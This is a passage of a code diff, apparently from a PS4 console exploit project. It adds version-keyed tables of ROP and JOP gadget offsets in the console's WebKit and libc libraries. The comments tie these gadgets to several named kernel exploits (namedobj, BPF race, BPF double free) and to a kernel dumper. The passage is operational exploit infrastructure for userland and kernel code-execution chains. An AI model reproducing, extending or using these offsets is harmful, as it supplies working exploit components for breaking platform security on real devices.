5.56) { + gadget_offsets = { + '__stack_chk_fail': 0x000000C8, // 5.50-5.56 + '__stack_chk_fail_offset': 0x00012F70, // 5.50-5.56 + 'memcpy': 0x000000F8, // 5.50-5.56 + 'memset': 0x00000228, // 5.50-5.56 + 'memset_offset': 0x00022F50, // 5.55-5.56 + 'setjmp': 0x000014F8, // 5.50-5.56 + 'scePthreadCreate': 0x0000A2D0, // 5.50-5.56 + // 'mov rdi, [rdi+0x48]': 0x0, // 48 8B 7F 48 C3 + 'sub rax, rcx': 0x0001FFEB, // 5.50-5.56 + 'add rax, [rdi]': 0x000462D8, // 5.55-5.56 + }; +} + +// Missing: <3.00 and >=6.50 +// These are from libSceWebKit2.sprx +var gadget_cache = {}; +if (fwFromUA >= 3.00 && fwFromUA <= 3.11) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x00000062, // 3.00-3.70 + 'jmp rax': 0x00000092, // 3.00-3.70 + 'ep': 0x000000BD, // 3.00-3.70 + 'pop rbp': 0x000000C6, // 3.00-3.70 + 'mov [rdi], rax': 0x000D9184, // 3.00-3.11 + 'pop r8': 0x0033E1DD, // 3.00-3.11 + 'pop rax': 0x0000FA1B, // 3.00-3.11 + 'mov rax, rdi': 0x00003253, // 3.00-3.11 + 'mov rax, [rax]': 0x0003A1B2, // 3.00-3.11 + 'pop rsi': 0x001CCF35, // 3.00-3.11 + 'pop rdi': 0x00103F0D, // 3.00-3.11 + 'pop rcx': 0x002B4123, // 3.00-3.11 + 'pop rsp': 0x00041F30, // 3.00-3.11 + 'mov [rdi], rsi': 0x002EEF90, // 3.00-3.11 + 'pop rdx': 0x003A0788, // 3.00-3.11 + 'pop r9': 0x00ADBEFF, // 3.00-3.11 + 'jop': 0x011399F4, // 3.00-3.11 + 'infloop': 0x0004668F, // 3.00-3.11 + + // kROP gadgets + 'mov [rdx], rax': 0x0040D8CD, // 3.00-3.11 + 'add rax, rcx': 0x0005AF06, // 3.00-3.11 + 'mov rdx, rax': 0x000E5B13, // 3.00-3.11 + 'mov rax, rdx': 0x001D3EE1, // 3.00-3.11 + 'jmp rdx': 0x0003588C, // 3.00-3.11 + + // namedobj kexploit + 'push rax; jmp rcx': 0x0030F0B0, // 3.00-3.11 + + // BPF race kexploit + 'leave': 0x000E5B2B, // 3.00-3.11 + + // BPF race old kexploit + 'leave_1': 0x0, /* CHECKTHIS */ + + // BPF double free kexploit + 'ret2userland': 0x00009E9A, // 3.00-3.11 + 'add rsp, 0x28': 0x00004228, // 3.00-3.11 + 'mov rax, [rdi]': 0x0006D5E0, // 3.00-3.11 + 'mov [rsi], rdx': 0x00E04C68, // 3.00-3.11 + 
'add rdi, rax; mov rax, rdi': 0x00E48C57, // 3.00-3.11 + + // BPF double free JOP kdumper + 'mov rsi, rax; jmp rcx': 0x00101290, // 3.00-3.11 + + // JOP gadgets for BPF double free kexploit + 'jop1': 0x0043E21D, // 3.00-3.11 + 'jop2': 0x0113EFB1, // 3.00-3.11 + 'jop3': 0x00CBD8EB, // 3.00-3.11 + 'jop4': 0x011399F0, // 3.00-3.11 + 'jop_mov rbp, rsp': 0x009ABC21, // 3.00-3.11 + 'jop6': 0x003FF95D, // 3.00-3.11 + + // Functions + 'longjmp': 0x00000D98, // 3.00-3.11 + 'createThread': 0x001C8B90, // 3.00-3.11 + }; +} else if (fwFromUA === 3.15) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x00000062, // 3.00-3.70 + 'jmp rax': 0x00000092, // 3.00-3.70 + 'ep': 0x000000BD, // 3.00-3.70 + 'pop rbp': 0x000000C6, // 3.00-3.70 + 'mov [rdi], rax': 0x000B62D4, // 3.15 + 'pop r8': 0x0030434D, // 3.15 + 'pop rax': 0x0000F43B, // 3.15 + 'mov rax, rdi': 0x00003193, // 3.15 + 'mov rax, [rax]': 0x0002D372, // 3.15 + 'pop rsi': 0x001935D5, // 3.15 + 'pop rdi': 0x001938D8, // 3.15 + 'pop rcx': 0x00247763, // 3.15 + 'pop rsp': 0x00064C05, // 3.15 + 'mov [rdi], rsi': 0x002B5100, // 3.15 + 'pop rdx': 0x00065A22, // 3.15 + 'pop r9': 0x00A4454F, // 3.15 + 'jop': 0x0106AA64, // 3.15 + 'infloop': 0x000115D6, // 3.15 + + // kROP gadgets + 'mov [rdx], rax': 0x003D3A3D, // 3.15 + 'add rax, rcx': 0x0004C826, // 3.15 + 'mov rdx, rax': 0x00E24F52, // 3.15 + 'mov rax, rdx': 0x0019A1E1, // 3.15 + 'jmp rdx': 0x00018E47, // 3.15 + + // namedobj kexploit + 'push rax; jmp rcx': 0x002D5220, // 3.15 + + // BPF race kexploit + 'leave': 0x00023D3B, // 3.15 + + // BPF race old kexploit + 'leave_1': 0x0, /* CHECKTHIS */ + + // BPF double free kexploit + 'ret2userland': 0x00009D9A, // 3.15 + 'add rsp, 0x28': 0x00004128, // 3.15 + 'mov rax, [rdi]': 0x0005D910, // 3.15 + 'mov [rsi], rdx': 0x00D6C858, // 3.15 + 'add rdi, rax; mov rax, rdi': 0x00DB0847, // 3.15 + + // BPF double free JOP kdumper + 'mov rsi, rax; jmp rcx': 0x000C85C0, // 3.15 + + // JOP gadgets for BPF double free kexploit + 'jop1': 
0x0040438D, // 3.15
+ 'jop2': 0x01070021, // 3.15
+ 'jop3': 0x00C254DB, // 3.15
+ 'jop4': 0x0106AA60, // 3.15
+ 'jop_mov rbp, rsp': 0x00914271, // 3.15
+ 'jop6': 0x003C5ACD, // 3.15
+
+ // Functions
+ 'longjmp': 0x00000CE8, // 3.15
+ 'createThread': 0x0018F260, // 3.15
+ };
+} else if (fwFromUA === 3.50) {
+ gadget_cache = {
+ // Regular ROP Gadgets
+ 'ret': 0x00000062, // 3.00-3.70
+ 'jmp rax': 0x00000092, // 3.00-3.70
+ 'ep': 0x000000BD, // 3.00-3.70
+ 'pop rbp': 0x000000C6, // 3.00-3.70
+ 'mov [rdi], rax': 0x0011FC37, // 3.50-3.70
+ 'pop r8': 0x004C12ED, // 3.50
+ 'pop rax': 0x0001C6AB, // 3.50-3.70
+ 'mov rax, rdi': 0x000057C3, // 3.50-3.70
+ 'mov rax, [rax]': 0x0004ADD2, // 3.50-3.70
+ 'pop rsi': 0x000B9EBB, // 3.50-3.70
+ 'pop rdi': 0x00113991, // 3.50-3.70
+ 'pop rcx': 0x003CA71B, // 3.50-3.70
+ 'pop rsp': 0x00376850, // 3.50-3.70
+ 'mov [rdi], rsi': 0x00458400, // 3.50
+ 'pop rdx': 0x00001AFA, // 3.50-3.70
+ 'pop r9': 0x00EE09BF, // 3.50
+ 'jop': 0x0086D424, // 3.50
+ 'infloop': 0x00057F2F, // 3.50-3.70
+
+ // kROP gadgets
+ 'mov [rdx], rax': 0x005DC36D, // 3.50
+ 'add rax, rcx': 0x000879D7, // 3.50-3.70
+ 'mov rdx, rax': 0x0000B45C, // 3.50-3.70
+ 'mov rax, rdx': 0x002E19F1, // 3.50-3.70
+ 'jmp rdx': 0x0002A4B2, // 3.50-3.70
+
+ // namedobj kexploit
+ 'push rax; jmp rcx': 0x004853E0, // 3.50
+
+ // BPF race kexploit
+ 'leave': 0x0000AE00, // 3.50-3.70
+
+ // BPF race old kexploit
+ 'leave_1': 0x00003E8A, // 3.50-3.70
+
+ // BPF double free kexploit
+ 'ret2userland': 0x0000FC7A, // 3.50-3.70
+ 'add rsp, 0x28': 0x00006AF2, // 3.50-3.70
+ 'mov rax, [rdi]': 0x000A0450, // 3.50-3.70
+ 'mov [rsi], rdx': 0x011EC363, // 3.50
+ 'add rdi, rax; mov rax, rdi': 0x012B4808, // 3.50
+
+ // BPF double free JOP kdumper
+ 'mov rsi, rax; jmp rcx': 0x001AC260, // 3.50-3.70
+
+ // JOP gadgets for BPF double free kexploit
+ 'jop1': 0x0061A79D, // 3.50
+ 'jop2': 0x00886391, // 3.50
+ 'jop3': 0x01120ADB, // 3.50
+ 'jop4': 0x0086D420, // 3.50
+ 'jop_mov rbp, rsp': 0x00D471F1, // 3.50
+ 'jop6': 0x005CB8BD, // 3.50
+
+ // Functions
+ 'longjmp': 0x00000D98, // 3.50-3.70
+ 'createThread': 0x002D1CB0, // 3.50-3.70
+ };
+} else if (fwFromUA >= 3.55 && fwFromUA <= 3.70) {
+ gadget_cache = {
+ // Regular ROP Gadgets
+ 'ret': 0x00000062, // 3.00-3.70
+ 'jmp rax': 0x00000092, // 3.00-3.70
+ 'ep': 0x000000BD, // 3.00-3.70
+ 'pop rbp': 0x000000C6, // 3.00-3.70
+ 'mov [rdi], rax': 0x0011FC37, // 3.50-3.70
+ 'pop r8': 0x004C13BD, // 3.55-3.70
+ 'pop rax': 0x0001C6AB, // 3.50-3.70
+ 'mov rax, rdi': 0x000057C3, // 3.50-3.70
+ 'mov rax, [rax]': 0x0004ADD2, // 3.50-3.70
+ 'pop rsi': 0x000B9EBB, // 3.50-3.70
+ 'pop rdi': 0x00113991, // 3.50-3.70
+ 'pop rcx': 0x003CA71B, // 3.50-3.70
+ 'pop rsp': 0x00376850, // 3.50-3.70
+ 'mov [rdi], rsi': 0x004584D0, // 3.55-3.70
+ 'pop rdx': 0x00001AFA, // 3.50-3.70
+ 'pop r9': 0x00EE0A8F, // 3.55-3.70
+ 'jop': 0x0086D4F4, // 3.55-3.70
+ 'infloop': 0x00057F2F, // 3.50-3.70
+
+ // kROP gadgets
+ 'mov [rdx], rax': 0x005DC43D, // 3.55-3.70
+ 'add rax, rcx': 0x000879D7, // 3.50-3.70
+ 'mov rdx, rax': 0x0000B45C, // 3.50-3.70
+ 'mov rax, rdx': 0x002E19F1, // 3.50-3.70
+ 'jmp rdx': 0x0002A4B2, // 3.50-3.70
+
+ // namedobj kexploit
+ 'push rax; jmp rcx': 0x004854B0, // 3.55-3.70
+
+ // BPF race kexploit
+ 'leave': 0x0000AE00, // 3.50-3.70
+
+ // BPF race old kexploit
+ 'leave_1': 0x00003E8A, // 3.50-3.70
+
+ // BPF double free kexploit
+ 'ret2userland': 0x0000FC7A, // 3.50-3.70
+ 'add rsp, 0x28': 0x00006AF2, // 3.50-3.70
+ 'mov rax, [rdi]': 0x000A0450, // 3.50-3.70
+ 'mov [rsi], rdx': 0x011EC433, // 3.55-3.70
+ 'add rdi, rax; mov rax, rdi': 0x012B48D8, // 3.55-3.70
+
+ // BPF double free JOP kdumper
+ 'mov rsi, rax; jmp rcx': 0x001AC260, // 3.50-3.70
+
+ // JOP gadgets for BPF double free kexploit
+ 'jop1': 0x0061A86D, // 3.55-3.70
+ 'jop2': 0x00886461, // 3.55-3.70
+ 'jop3': 0x01120BAB, // 3.55-3.70
+ 'jop4': 0x0086D4F0, // 3.55-3.70
+ 'jop_mov rbp, rsp': 0x00D472C1, // 3.55-3.70
+ 'jop6': 0x005CB98D, // 3.55-3.70
+
+ // Functions
+ 'longjmp': 0x00000D98, // 3.50-3.70
+ 'createThread': 0x002D1CB0, // 3.50-3.70
+ };
+} else if (fwFromUA >= 4.00 && fwFromUA <= 4.05) {
+ gadget_cache = {
+ // Regular ROP Gadgets
+ 'ret': 0x000000C8, // 4.00-4.07
+ 'jmp rax': 0x00000093, // 4.00-4.07
+ 'ep': 0x000000BE, // 4.00-4.07
+ 'pop rbp': 0x000000C7, // 4.00-4.07
+ 'mov [rdi], rax': 0x0011ADD7, // 4.00-4.07
+ 'pop r8': 0x004A3B0D, // 4.00-4.07
+ 'pop rax': 0x0001D70B, // 4.00-4.07
+ 'mov rax, rdi': 0x00005863, // 4.00-4.07
+ 'mov rax, [rax]': 0x000FD88D, // 4.00-4.07
+ 'pop rsi': 0x000A459E, // 4.00-4.07
+ 'pop rdi': 0x0010F1C1, // 4.00-4.07
+ 'pop rcx': 0x004C92F5, // 4.00-4.07
+ 'pop rsp': 0x0020AEB0, // 4.00-4.07
+ 'mov [rdi], rsi': 0x0043CF70, // 4.00-4.07
+ 'pop rdx': 0x000D6660, // 4.00-4.07
+ 'pop r9': 0x00EB5F8F, // 4.00-4.07
+ 'jop': 0x00852624, // 4.00-4.07
+ 'infloop': 0x00045A11, // 4.00-4.07
+
+ // kROP gadgets
+ 'mov [rdx], rax': 0x005BB74D, // 4.00-4.07
+ 'add rax, rcx': 0x00086F06, // 4.00-4.07
+ 'mov rdx, rax': 0x0000B44A, // 4.00-4.07
+ 'mov rax, rdx': 0x000DAB96, // 4.00-4.07
+ 'jmp rdx': 0x0027A198, // 4.00-4.07
+
+ // namedobj kexploit
+ 'push rax; jmp rcx': 0x00469B80, // 4.00-4.07
+
+ // BPF race kexploit
+ 'leave': 0x001B7D63, // 4.00-4.07
+
+ // BPF race old kexploit
+ 'leave_1': 0x00003F1A, // 4.00-4.07
+
+ // BPF double free kexploit
+ 'ret2userland': 0x0000FC0A, // 4.00-4.07
+ 'add rsp, 0x28': 0x00006B72, // 4.00-4.07
+ 'mov rax, [rdi]': 0x0009E490, // 4.00-4.07
+ 'mov [rsi], rdx': 0x011C1703, // 4.00-4.05
+ 'add rdi, rax; mov rax, rdi': 0x01289BA8, // 4.00-4.05
+
+ // BPF double free JOP kdumper
+ 'mov rsi, rax; jmp rcx': 0x001A7B90, // 4.00-4.07
+
+ // JOP gadgets for BPF double free kexploit
+ 'jop1': 0x005FA63D, // 4.00-4.07
+ 'jop2': 0x0086BAC1, // 4.00-4.07
+ 'jop3': 0x010F5E7B, // 4.00-4.07
+ 'jop4': 0x00852620, // 4.00-4.07
+ 'jop_mov rbp, rsp': 0x002F88E4, // 4.00-4.07
+ 'jop6': 0x005AAD1D, // 4.00-4.07
+
+ // Functions
+ 'longjmp': 0x00000DE0, // 4.00-4.07
+ 'createThread': 0x002C48C0, // 4.00-4.07
+ };
+} else if (fwFromUA >= 4.06 && fwFromUA <= 4.07) {
+ gadget_cache = {
+ // Regular ROP Gadgets
+ 'ret': 0x000000C8, // 4.00-4.07
+ 'jmp rax': 0x00000093, // 4.00-4.07
+ 'ep': 0x000000BE, // 4.00-4.07
+ 'pop rbp': 0x000000C7, // 4.00-4.07
+ 'mov [rdi], rax': 0x0011ADD7, // 4.00-4.07
+ 'pop r8': 0x004A3B0D, // 4.00-4.07
+ 'pop rax': 0x0001D70B, // 4.00-4.07
+ 'mov rax, rdi': 0x00005863, // 4.00-4.07
+ 'mov rax, [rax]': 0x000FD88D, // 4.00-4.07
+ 'pop rsi': 0x000A459E, // 4.00-4.07
+ 'pop rdi': 0x0010F1C1, // 4.00-4.07
+ 'pop rcx': 0x004C92F5, // 4.00-4.07
+ 'pop rsp': 0x0020AEB0, // 4.00-4.07
+ 'mov [rdi], rsi': 0x0043CF70, // 4.00-4.07
+ 'pop rdx': 0x000D6660, // 4.00-4.07
+ 'pop r9': 0x00EB5F8F, // 4.00-4.07
+ 'jop': 0x00852624, // 4.00-4.07
+ 'infloop': 0x00045A11, // 4.00-4.07
+
+ // kROP gadgets
+ 'mov [rdx], rax': 0x005BB74D, // 4.00-4.07
+ 'add rax, rcx': 0x00086F06, // 4.00-4.07
+ 'mov rdx, rax': 0x0000B44A, // 4.00-4.07
+ 'mov rax, rdx': 0x000DAB96, // 4.00-4.07
+ 'jmp rdx': 0x0027A198, // 4.00-4.07
+
+ // namedobj kexploit
+ 'push rax; jmp rcx': 0x00469B80, // 4.00-4.07
+
+ // BPF race kexploit
+ 'leave': 0x001B7D63, // 4.00-4.07
+
+ // BPF race old kexploit
+ 'leave_1': 0x00003F1A, // 4.00-4.07
+
+ // BPF double free kexploit
+ 'ret2userland': 0x0000FC0A, // 4.00-4.07
+ 'add rsp, 0x28': 0x00006B72, // 4.00-4.07
+ 'mov rax, [rdi]': 0x0009E490, // 4.00-4.07
+ 'mov [rsi], rdx': 0x011C3983, // 4.06-4.07
+ 'add rdi, rax; mov rax, rdi': 0x012A14E8, // 4.06-4.07
+
+ // BPF double free JOP kdumper
+ 'mov rsi, rax; jmp rcx': 0x001A7B90, // 4.00-4.07
+
+ // JOP gadgets for BPF double free kexploit
+ 'jop1': 0x005FA63D, // 4.00-4.07
+ 'jop2': 0x0086BAC1, // 4.00-4.07
+ 'jop3': 0x010F5E7B, // 4.00-4.07
+ 'jop4': 0x00852620, // 4.00-4.07
+ 'jop_mov rbp, rsp': 0x002F88E4, // 4.00-4.07
+ 'jop6': 0x005AAD1D, // 4.00-4.07
+
+ // Functions
+ 'longjmp': 0x00000DE0, // 4.00-4.07
+ 'createThread': 0x002C48C0, // 4.00-4.07
+ };
+} else if (fwFromUA >= 4.50 && fwFromUA <= 4.74) {
+ gadget_cache = {
+ // Regular ROP Gadgets
+ 'ret': 0x0000003C, // 4.50-6.20
+ 'jmp rax': 0x00000082, // 4.50-5.56
+ 'ep': 0x000000AD, // 4.50-5.56
+ 'pop rbp': 0x000000B6, // 4.50-6.20
+ 'mov [rdi], rax': 0x00003FBA, // 4.50-4.74
+ 'pop r8': 0x0000CC42, // 4.50-4.74
+ 'pop rax': 0x0000CC43, // 4.50-4.74
+ 'mov rax, rdi': 0x0000E84E, // 4.50-4.74
+ 'mov rax, [rax]': 0x000130A3, // 4.50-4.74
+ 'pop rsi': 0x0007B1EE, // 4.50-4.74
+ 'pop rdi': 0x0007B23D, // 4.50-4.74
+ 'pop rcx': 0x00271DE3, // 4.50-4.74
+ 'pop rsp': 0x0027A450, // 4.50-4.74
+ 'mov [rdi], rsi': 0x0039CF70, // 4.50-4.74
+ 'pop rdx': 0x00565838, // 4.50-4.74
+ 'pop r9': 0x0078BA1F, // 4.50-4.74
+ 'jop': 0x01277350, // 4.50-4.74
+ 'infloop': 0x012C4009, // 4.50-4.74
+
+ // kROP gadgets
+ 'mov [rdx], rax': 0x009B5BE3, // 4.50-4.74
+ 'add rax, rcx': 0x0084D04D, // 4.50-4.74
+ 'mov rdx, rax': 0x00012A16, // 4.50-4.74
+ 'mov rax, rdx': 0x001E4EDE, // 4.50-4.74
+ 'jmp rdx': 0x001517C7, // 4.50-4.74
+
+ // BPF race kexploit
+ 'leave': 0x0003EBD0, // 4.50-4.74
+
+ // BPF double free kexploit
+ 'ret2userland': 0x0008905C, // 4.50-4.74
+ 'add rsp, 0x28': 0x000028A2, // 4.50-4.74
+ 'mov rax, [rdi]': 0x0013A220, // 4.50-4.74
+ 'mov [rsi], rdx': 0x01574006, // 4.50-4.74
+ 'add rdi, rax; mov rax, rdi': 0x0141D1CD, // 4.50-4.74
+
+ // BPF double free JOP kdumper
+ 'mov rsi, rax; jmp rcx': 0x00018C10, // 4.50-4.74
+
+ // JOP gadgets for BPF double free kexploit
+ 'jop1': 0x005D365D, // 4.50-4.74
+ 'jop2': 0x007B0E65, // 4.50-4.74
+ 'jop3': 0x0142BDBB, // 4.50-4.74
+ 'jop4': 0x00637AC4, // 4.50-4.74
+ 'jop_mov rbp, rsp': 0x001B5B7A, // 4.50-4.74
+ 'jop6': 0x000F391D, // 4.50-4.74
+
+ // Functions
+ 'longjmp': 0x00001458, // 4.50-4.74
+ 'createThread': 0x0116ED40, // 4.50-4.74
+ };
+} else if (fwFromUA >= 5.00 && fwFromUA <= 5.01) {
+ gadget_cache = {
+ // Regular ROP Gadgets
+ 'ret': 0x0000003C, // 4.50-6.20
+ 'jmp rax': 0x00000082, // 4.50-5.56
+ 'ep': 0x000000AD, // 4.50-5.56
+ 'pop rbp': 0x000000B6, // 4.50-6.20
+ 'mov [rdi], rax': 0x0014536B, // 5.00-5.01
+ 'pop r8': 0x000179C5, // 5.00-5.07
+ 'pop rax': 0x000043F5, // 5.00-5.07
+ 'mov rax, rdi': 0x000058D0, // 5.00-5.07
+ 'mov rax, [rax]': 0x0006C83A, // 5.00-5.07
+ 'pop rsi': 0x0008F38A, // 5.00-5.07
+ 'pop rdi': 0x00038DBA, // 5.00-5.07
+ 'pop rcx': 0x00052E59, // 5.00-5.07
+ 'pop rsp': 0x0001E687, // 5.00-5.07
+ 'mov [rdi], rsi': 0x00023AC2, // 5.00-5.07
+ 'pop rdx': 0x000DEDC2, // 5.00-5.01
+ 'pop r9': 0x00BB30CF, // 5.00-5.01
+ 'jop': 0x000C37D0, // 5.00-5.07
+ 'infloop': 0x0000D53B, // 5.00-5.07
+
+ // kROP gadgets
+ 'mov [rdx], rax': 0x001F13DB, // 5.00-5.01
+ 'add rax, rcx': 0x000156DB, // 5.00-5.07
+ 'mov rdx, rax': 0x00353A71, // 5.00-5.01
+ 'mov rax, rdx': 0x001CEE60, // 5.00-5.01
+ 'jmp rdx': 0x0000E3D0, // 5.00-5.07
+
+ // BPF double free kexploit
+ 'ret2userland': 0x0005CDB9, // 5.00-5.07
+ 'add rsp, 0x28': 0x00004C2E, // 5.00-5.07
+ 'mov rax, [rdi]': 0x00046EF9, // 5.00-5.07
+ 'mov [rsi], rdx': 0x00A643CA, // 5.00-5.01
+ 'add rdi, rax; mov rax, rdi': 0x0055566F, // 5.00-5.01
+
+ // BPF double free JOP kdumper
+ 'mov rsi, rax; jmp rcx': 0x0000DEE0, // 5.00-5.07
+
+ // JOP gadgets for BPF double free kexploit
+ 'jop1': 0x012A184D, // 5.00-5.01
+ 'jop2': 0x006EF2E5, // 5.00-5.01
+ 'jop3': 0x015CA29B, // 5.00-5.01
+ 'jop4': 0x012846B4, // 5.00-5.01
+ 'jop_mov rbp, rsp': 0x000F094A, // 5.00-5.07
+ 'jop6': 0x002728A1, // 5.00-5.01
+
+ 'longjmp': 0x000014E8, // 5.00-5.07
+ 'createThread': 0x00779190, // 5.00-5.01
+ };
+} else if (fwFromUA >= 5.03 && fwFromUA <= 5.07) {
+ gadget_cache = {
+ // Regular ROP Gadgets
+ 'ret': 0x0000003C, // 4.50-6.20
+ 'jmp rax': 0x00000082, // 4.50-5.56
+ 'ep': 0x000000AD, // 4.50-5.56
+ 'pop rbp': 0x000000B6, // 4.50-6.20
+ 'mov [rdi], rax': 0x0014536B, // 5.03-5.07
+ 'pop r8': 0x000179C5, // 5.00-5.07
+ 'pop rax': 0x000043F5, // 5.00-5.07
+ 'mov rax, rdi': 0x000058D0, // 5.00-5.07
+ 'mov rax, [rax]': 0x0006C83A, // 5.00-5.07
+ 'pop rsi': 0x0008F38A, // 5.00-5.07
+ 'pop rdi': 0x00038DBA, // 5.00-5.07
+ 'pop rcx': 0x00052E59, // 5.00-5.07
+ 'pop rsp': 0x0001E687, // 5.00-5.07
+ 'mov [rdi], rsi': 0x00023AC2, // 5.00-5.07
+ 'pop rdx': 0x001BE024, // 5.03-5.07
+ 'pop r9': 0x00BB320F, // 5.03-5.07
+ 'jop': 0x000C37D0, // 5.00-5.07
+ 'infloop': 0x0000D53B, // 5.00-5.07
+
+ // kROP gadgets
+ 'mov [rdx], rax': 0x001F149B, // 5.03-5.07
+ 'add rax, rcx': 0x000156DB, // 5.00-5.07
+ 'mov rdx, rax': 0x00353B31, // 5.03-5.07
+ 'mov rax, rdx': 0x001CEF20, // 5.03-5.07
+ 'jmp rdx': 0x0000E3D0, // 5.00-5.07
+
+ // BPF double free kexploit
+ 'ret2userland': 0x0005CDB9, // 5.00-5.07
+ 'add rsp, 0x28': 0x00004C2E, // 5.00-5.07
+ 'mov rax, [rdi]': 0x00046EF9, // 5.00-5.07
+ 'mov [rsi], rdx': 0x00A6450A, // 5.03-5.07
+ 'add rdi, rax; mov rax, rdi': 0x005557DF, // 5.03-5.07
+
+ // BPF double free JOP kdumper
+ 'mov rsi, rax; jmp rcx': 0x0000DEE0, // 5.00-5.07
+
+ // JOP gadgets for BPF double free kexploit
+ 'jop1': 0x012A19CD, // 5.03-5.07
+ 'jop2': 0x006EF4E5, // 5.03-5.07
+ 'jop3': 0x015CA41B, // 5.03-5.07
+ 'jop4': 0x01284834, // 5.03-5.07
+ 'jop_mov rbp, rsp': 0x000F094A, // 5.00-5.07
+ 'jop6': 0x00272961, // 5.03-5.07
+
+ 'longjmp': 0x000014E8, // 5.00-5.07
+ 'createThread': 0x00779390, // 5.03-5.07
+ };
+} else if (fwFromUA === 5.50) {
+ gadget_cache = {
+ // Regular ROP Gadgets
+ 'ret': 0x0000003C, // 4.50-6.20
+ 'jmp rax': 0x00000082, // 4.50-5.56
+ 'ep': 0x000000AD, // 4.50-5.56
+ 'pop rbp': 0x000000B6, // 4.50-6.20
+ 'mov [rdi], rax': 0x003BD04B, // 5.50-5.56
+ 'pop r8': 0x000188A0, // 5.50-5.56
+ 'pop rax': 0x00004575, // 5.50-5.56
+ 'mov rax, rdi': 0x00005AD0, // 5.50-5.56
+ 'mov rax, [rax]': 0x000F1ABA, // 5.50-5.56
+ 'pop rsi': 0x00091D11, // 5.50-5.56
+ 'pop rdi': 0x0003A5DF, // 5.50-5.56
+ 'pop rcx': 0x00029451, // 5.50-5.56
+ 'pop rsp': 0x0001F4AD, // 5.50-5.56
+ 'mov [rdi], rsi': 0x00024CE2, // 5.50-5.56
+ 'pop rdx': 0x0010AC52, // 5.50
+ 'pop r9': 0x0146FF4F, // 5.50
+ 'jop': 0x000C6A20, // 5.50-5.56
+ 'infloop': 0x00003B1F, // 5.50-5.56
+ };
+} else if (fwFromUA >= 5.53 && fwFromUA <= 5.56) {
+ gadget_cache = {
+ // Regular ROP Gadgets
+ 'ret': 0x0000003C, // 4.50-6.20
+ 'jmp rax': 0x00000082, // 4.50-5.56
+ 'ep': 0x000000AD, // 4.50-5.56
+ 'pop rbp': 0x000000B6, // 4.50-6.20
+ 'mov [rdi], rax': 0x000BEF5C, // 5.50-5.56
+ 'pop r8': 0x000188A5, // 5.50-5.56
+ 'pop rax': 0x00004575, // 5.50-5.56
+ 'mov rax, rdi': 0x00005AD0, // 5.50-5.56
+ 'mov rax, [rax]': 0x000F1ABA, // 5.50-5.56
+ 'pop rsi': 0x00091D11, // 5.50-5.56
+ 'pop rdi': 0x0003A5DF, // 5.50-5.56
+ 'pop rcx': 0x00029451, // 5.50-5.56
+ 'pop rsp': 0x0001F4AD, // 5.50-5.56
+ 'mov [rdi], rsi': 0x00024CE2, // 5.50-5.56
+ 'pop rdx': 0x000BDD06, // 5.53-5.56
+ 'pop r9': 0x0146FF6F, // 5.53-5.56
+ 'jop': 0x000C6A20, // 5.50-5.56
+ 'infloop': 0x00003B1F, // 5.50-5.56
+ };
+} else if (fwFromUA >= 6.00 && fwFromUA <= 6.02) {
+ gadget_cache = {
+ // Regular ROP Gadgets
+ 'ret': 0x0000003C, // 4.50-6.20
+ 'infloop': 0x00013AAE, // 6.00-6.20
+
+ 'pop rdi': 0x00AC95F2, // 6.00-6.20
+ 'pop rsi': 0x000756CB, // 6.00-6.20
+ 'pop rdx': 0x002A9BA2, // 6.00-6.02
+ 'pop rcx': 0x000348D3, // 6.00-6.20
+ 'pop r8': 0x00079211, // 6.00-6.20
+ 'pop r9': 0x000CDB41, // 6.00-6.20
+ 'pop rax': 0x00075BDF, // 6.00-6.20
+ 'pop rbp': 0x000000B6, // 4.50-6.20
+ 'pop rsp': 0x00075D9A, // 6.00-6.20
+
+ 'mov rax, rdi': 0x00008CD0, // 6.00-6.20
+ 'mov rdx, rdi': 0x006271EE, // 6.00-6.02
+ 'mov rax, rdx': 0x0007BC20, // 6.00-6.20
+ 'mov rax, [rax]': 0x0002DC22, // 6.00-6.20
+ 'mov [rdi], rsi': 0x00034EF0, // 6.00-6.20
+ 'mov [rdi], rax': 0x0001FB49, // 6.00-6.20
+ 'mov [rax], rdi': 0x01762997, // 6.00-6.02
+ 'mov [rax], rsi': 0x0133138D, // 6.00-6.02
+ 'mov rdx, [rcx]': 0x001848F4, // 6.00-6.20
+
+ 'add rax, rcx': 0x000C3F62, // 6.00-6.20
+ 'add rax, rsi': 0x013F9523, // 6.00-6.02
+ 'and rax, rcx': 0x00746F34, // 6.00-6.02
+
+ 'jmp rdi': 0x0000CEA5, // 6.00-6.20
+ };
+} else if (fwFromUA === 6.20) {
+ gadget_cache = {
+ // Regular ROP Gadgets
+ 'ret': 0x0000003C, // 4.55-6.20
+ 'infloop': 0x00013AAE, // 6.00-6.20
+
+ 'pop rdi': 0x00AC95F2, // 6.00-6.20
+ 'pop rsi': 0x000756CB, // 6.00-6.20
+ 'pop rdx': 0x002516B2, // 6.20
+ 'pop rcx': 0x000348D3, // 6.00-6.20
+ 'pop r8': 0x00079211, // 6.00-6.20
+ 'pop r9': 0x000CDB41, // 6.00-6.20
+ 'pop rax': 0x00075BDF, // 6.00-6.20
+ 'pop rbp': 0x000000B6, // 4.55-6.20
+ 'pop rsp': 0x00075D9A, // 6.00-6.20
+
+ 'mov rax, rdi': 0x00008CD0, // 6.00-6.20
+ 'mov rdx, rdi': 0x006271FE, // 6.20
+ 'mov rax, rdx': 0x0007BC20, // 6.00-6.20
+ 'mov rax, [rax]': 0x0002DC22, // 6.00-6.20
+ 'mov [rdi], rsi': 0x00034EF0, // 6.00-6.20
+ 'mov [rdi], rax': 0x0001FB49, // 6.00-6.20
+ 'mov [rax], rdi': 0x017629A7, // 6.20
+ 'mov [rax], rsi': 0x0133139D, // 6.20
+ 'mov rdx, [rcx]': 0x001848F4, // 6.00-6.20
+
+ 'add rax, rcx': 0x000C3F62, // 6.00-6.20
+ 'add rax, rsi': 0x013F9533, // 6.20
+ 'and rax, rcx': 0x00746F44, // 6.20
+
+ 'jmp rdi': 0x0000CEA5, // 6.00-6.20
+ };
+}
+
+// Missing: <3.00
+// Only used for BPF double free kernel exploit
+// These are based on the JOP functions selected in libSceWebKit2.sprx
+var gadget_shifts = {};
+if (fwFromUA >= 3.00 && fwFromUA <= 4.07) {
+ gadget_shifts = {
+ 'stackshift_jop1': 0x00000018, // 3.00-4.07
+ 'stackshift_jop6': 0x00000028, // 3.00-5.07
+ 'jump_shift_jop1': 0x000003C0, // 3.00-4.07
+ 'jump_shift_jop5': 0x00000410, // 3.00-4.07
+ 'jump_shift_jop6': 0x00000358, // 3.00-4.07
+ };
